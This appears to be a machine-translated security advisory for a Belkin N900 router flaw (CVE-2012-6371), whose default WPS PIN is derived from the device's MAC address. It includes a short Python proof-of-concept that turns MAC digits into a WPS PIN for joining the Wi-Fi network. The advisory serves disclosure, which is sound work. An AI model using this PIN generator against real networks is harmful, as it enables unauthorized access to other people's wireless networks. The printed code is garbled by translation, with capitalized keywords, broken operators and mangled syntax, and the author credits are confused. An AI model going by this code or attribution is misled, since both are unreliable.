Belkin Wireless Router default wps pin Security Vulnerability

Release date:
Updated on:

Affected Systems:
Belkin Wireless Router Belkin N900 F9K1104v1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57128
CVE (CAN) ID: CVE-2012-6371
 
Belkin Wireless Routers is a Wireless router product of Belkin.
 
The implementation of Belkin N900 F9K1104v1 and other versions of WPA2 creates a wps pin based on a 6-digit LAN/wlan mac address. By reading broadcast packets, remote attackers can exploit this vulnerability to access the Wi-Fi network.
 
<* Source: ZhaoChunsheng (e.novellalorente@student.ru.nl)

Link: http://ednolo.alumnos.upv.es /? P = 1295
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
@ Author: e.novellalorente@student.ru.nl
Original work: ZhaoChunsheng 04/07/2012

'''

Import sys

VERSION = 0
SUBVERSION = 2

Def usage ():
Print "[+] WPSpin % d. % d" % (VERSION, SUBVERSION)
Print "[*] Usage: python WPSpin. py 123456"
Sys. exit (0)

Def wps_pin_checksum (pin ):
Accum = 0

While (pin ):
Accum + = 3 * (pin % 10)
Pin/= 10
Accum + = pin % 10
Pin/= 10
Return (10-accum % 10) % 10

Try:
If (len (sys. argv [1]) = 6 ):
P = int (sys. argv [1], 16) % 10000000
Print "[+] WPS pin is: % 07d % d" % (p, wps_pin_checksum (p ))
Else:
Usage ()
Failed t Exception:
Usage ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Belkin
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.belkin.com/